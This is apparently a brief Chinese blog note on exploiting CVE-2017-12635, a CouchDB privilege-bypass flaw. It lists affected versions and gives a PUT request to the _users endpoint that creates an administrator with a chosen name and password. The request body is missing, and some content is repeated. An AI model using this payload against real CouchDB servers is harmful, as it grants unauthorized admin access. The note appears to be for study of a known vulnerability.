【笔记】CVE-2017-12635漏洞利用
前言
CouchDB垂直权限绕过漏洞
漏洞利用前提
- CouchDB 1.x(<1.7.0)
- CouchDB 2.x(<2.1.1)
payload
<username>:定义管理员用户名<password>:定义管理员密码
1 | PUT http://127.0.0.1:5984/_users/org.couchdb.user:<username> |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
CouchDB垂直权限绕过漏洞
<username>:定义管理员用户名<password>:定义管理员密码
1 | PUT http://127.0.0.1:5984/_users/org.couchdb.user:<username> |